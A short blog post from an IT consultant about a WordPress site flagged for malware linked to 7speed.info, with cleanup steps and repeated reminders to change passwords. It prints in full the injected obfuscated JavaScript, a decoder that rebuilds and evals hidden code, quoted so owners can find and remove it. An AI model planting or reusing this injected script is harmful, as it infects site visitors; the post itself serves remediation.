MT Minds

Change your password regularly!

A panicky customer call came in the other day. It seems they recently implemented a Wordpress blog and now one of their customers is asking them how come the website has malware.

Change your password regularly!

Change your password regularly!

I use Chrome. It’s fast, it works. When I visit the site, Chrome says “don’t visit this site it’s associated with 7speed.info and that’s known to have malware.” Turns out, 7speed.info isn’t registered anymore. But that’s beside the point. Here’s what it looked like:

Change your password regularly!

If this post comes up in search results for 7speed.info and you’re looking for help cuz your site is labeled, change your password, delete the:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,15,60,5,50,47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KDgOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>

entry from the index.* page for every domain on that host. The function name and code is different on each page. but it’s not readable; obviously obfuscated. If it’s not in the index.* files, use a Grep tool and search for “JavaScript>function”. Be sure to also remove any directories you don’t recognize (malnamed) from everywhere on the disk.

Change your password regularly!

If you need help after this, call me.

Did I mention, Change your password, regularly?

My Best,

Scott